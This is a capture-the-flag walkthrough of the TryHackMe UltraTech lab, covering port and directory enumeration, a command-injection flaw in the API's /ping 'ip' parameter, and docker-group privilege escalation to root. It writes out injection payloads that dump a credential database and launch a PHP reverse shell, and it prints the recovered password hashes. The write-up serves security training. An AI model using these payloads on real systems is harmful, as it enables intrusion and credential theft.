# UltraTech

{% embed url="https://tryhackme.com/Room/ultratech1" %}

## Enumeration

### nmap

```bash
PORT      STATE SERVICE REASON         VERSION
21/tcp    open  ftp     syn-ack ttl 61 vsftpd 3.0.3
22/tcp    open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:66:89:85:e7:05:c2:a5:da:7f:01:20:3a:13:fc:27 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDiFl7iswZsMnnI2RuX0ezMMVjUXFY1lJmZr3+H701ZA6nJUb2ymZyXusE/wuqL4BZ+x5gF2DLLRH7fdJkdebuuaMpQtQfEdsOMT+JakQgCDls38FH1jcrpGI3MY55eHcSilT/EsErmuvYv1s3Yvqds6xoxyvGgdptdqiaj4KFBNSDVneCSF/K7IQdbavM3Q7SgKchHJUHt6XO3gICmZmq8tSAdd2b2Ik/rYzpIiyMtfP3iWsyVgjR/q8oR08C2lFpPN8uSyIHkeH1py0aGl+V1E7j2yvVMIb4m3jGtLWH89iePTXmfLkin2feT6qAm7acdktZRJTjaJ8lEMFTHEijJ
|   256 c3:67:dd:26:fa:0c:56:92:f3:5b:a0:b3:8d:6d:20:ab (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLy2NkFfAZMY462Bf2wSIGzla3CDXwLNlGEpaCs1Uj55Psxk5Go/Y6Cw52NEljhi9fiXOOkIxpBEC8bOvEcNeNY=
|   256 11:9b:5a:d6:ff:2f:e4:49:d2:b5:17:36:0e:2f:1d:2f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEipoohPz5HURhNfvE+WYz4Hc26k5ObMPnAQNoUDsge3
8081/tcp  open  http    syn-ack ttl 61 Node.js Express framework
|_http-cors: HEAD GET POST PUT DELETE PATCH
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
31331/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 15C1B7515662078EF4B5C724E2927A96
|_http-title: UltraTech - The best of technology (AI, FinTech, Big Data)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
```

### Web page

#### Port 31331

![image.png](/files/zlvXSRDVjA7alQ8Tqilm)

<figure><img src="/files/GANaTa97wHX6DY4X2b61" alt=""><figcaption></figcaption></figure>

```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://10.10.41.142:31331/FUZZ -ic
images                  [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 429ms]
                        [Status: 200, Size: 6092, Words: 393, Lines: 140, Duration: 3616ms]
css                     [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 411ms]
js                      [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 422ms]
javascript              [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 425ms]
server-status           [Status: 403, Size: 303, Words: 22, Lines: 12, Duration: 490ms]
```

<figure><img src="/files/JEZBPhL3V8aC4HcGRlot" alt="" width="375"><figcaption></figcaption></figure>

#### Port 8081

<figure><img src="/files/IzzGqx1yGKZmTOzrF1Gb" alt=""><figcaption></figcaption></figure>

The room's question had me baffled at first; the answer is the two routes the API exposes, **auth** and **ping**, which ffuf finds under the root of port 8081:

```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://10.10.41.142:8081/FUZZ -ic
                        [Status: 200, Size: 20, Words: 3, Lines: 1, Duration: 453ms]
auth                    [Status: 200, Size: 39, Words: 8, Lines: 1, Duration: 423ms]
ping                    [Status: 500, Size: 1094, Words: 52, Lines: 11, Duration: 421ms]
```

`/ping`:

<figure><img src="/files/rotiBTtA1YhhbtPgTviA" alt=""><figcaption></figcaption></figure>

`/auth`:

<figure><img src="/files/fV96S1cHXXliRWJMO0Oe" alt=""><figcaption></figcaption></figure>

### api

To see how the API is actually used, open `api.js` from the `js` directory of the main site on port 31331:

```javascript
(function() {
    console.warn('Debugging ::');

    // The API lives on the same host as the site, on port 8081.
    function getAPIURL() {
        return `${window.location.hostname}:8081`
    }

    // Health check: GET /ping?ip=<this site's hostname>. The ip value is
    // taken straight from the page location; it is this parameter that
    // turns out to be injectable on the server side.
    function checkAPIStatus() {
        const req = new XMLHttpRequest();
        try {
            const url = `http://${getAPIURL()}/ping?ip=${window.location.hostname}`
            req.open('GET', url, true);
            req.onload = function (e) {
                if (req.readyState === 4) {
                    if (req.status === 200) {
                        console.log('The api seems to be running')
                    } else {
                        console.error(req.statusText);
                    }
                }
            };
            req.onerror = function (e) {
                // The file on the target references an undefined `xhr` here;
                // the request object in scope is `req`.
                console.error(req.statusText);
            };
            req.send(null);
        }
        catch (e) {
            console.error(e)
            console.log('API Error');
        }
    }
    // Run once on load, then every 10 seconds.
    checkAPIStatus()
    const interval = setInterval(checkAPIStatus, 10000);
    // The login form on the page posts to the API's /auth route.
    const form = document.querySelector('form')
    form.action = `http://${getAPIURL()}/auth`;

})();
```

This code explicitly builds a URL to the `/ping` route and sends a GET request to it, once immediately and then every 10 seconds. That makes `/ping` the **first used route**.

With the `/ping` route in hand, recreate the request by hand and give it an `ip` value of your own; either `localhost` or `127.0.0.1` works:

<figure><img src="/files/22ovgHD25Iu4SY0kQgjV" alt=""><figcaption></figcaption></figure>

#### Command injection

Since the `ip` value is clearly handed to a system `ping`, I went straight for command injection, and after a few payloads one of them works:

<figure><img src="/files/wJLd0WSENOD7H39emFc7" alt=""><figcaption></figcaption></figure>

Because the value reaches a shell, a backtick-quoted command substituted into it dumps the `utech.db.sqlite` file from the API's working directory:

```bash
http://<ip>:8081/ping?ip=%20`cat%20utech.db.sqlite`
```

The response is the raw SQLite file; the readable part is the `users` table schema and its two rows, each a login and an unsalted 32-character hex digest:

```text
CREATE TABLE users (
            login Varchar,
            password Varchar,
            type Int
)
r00t:f357a0c52799563c7c7b76c1e7543a32
admin:0d0ea5111e3c1def594c1684e3b9be84
```

<figure><img src="/files/DywH1XcXvAhjbhi2Nv0c" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/BaLvVyWadjosly8Qt4HV" alt="" width="563"><figcaption></figcaption></figure>

#### reverse shell

A reverse shell is another way in. The PHP reverse shell file first has to be transferred to the target, which is done with `wget` through the same injection; it is then triggered with `php`, this time using a URL-encoded newline (`%0A`) to start the second command:

<figure><img src="/files/rRaAv6h1qUz0xQStVw9o" alt=""><figcaption></figcaption></figure>

```text
http://10.10.41.142:8081/ping?ip=127.0.0.1%0Aphp%20php-reverse-shell.php
```

#### Misc

Logging in with the recovered credentials shows the following message:

<figure><img src="/files/ctF2czu4XBpKMkngUlM7" alt="" width="563"><figcaption></figcaption></figure>

```text
Restricted area
Hey r00t, can you please have a look at the server's configuration?
The intern did it and I don't really trust him.
Thanks!

lp1
```

### Privilege escalation

Log in as `r00t` over SSH with the recovered credentials.

<figure><img src="/files/PYbWgdyzACocqzNjpYcH" alt=""><figcaption></figcaption></figure>

<https://gtfobins.github.io/gtfobins/docker/>

It turns out `r00t` is a member of the `docker` group, which is enough to run the docker entry from GTFOBins linked above and get a root shell.

From there, go into `/root/.ssh` and read `id_rsa`; that key is the answer.


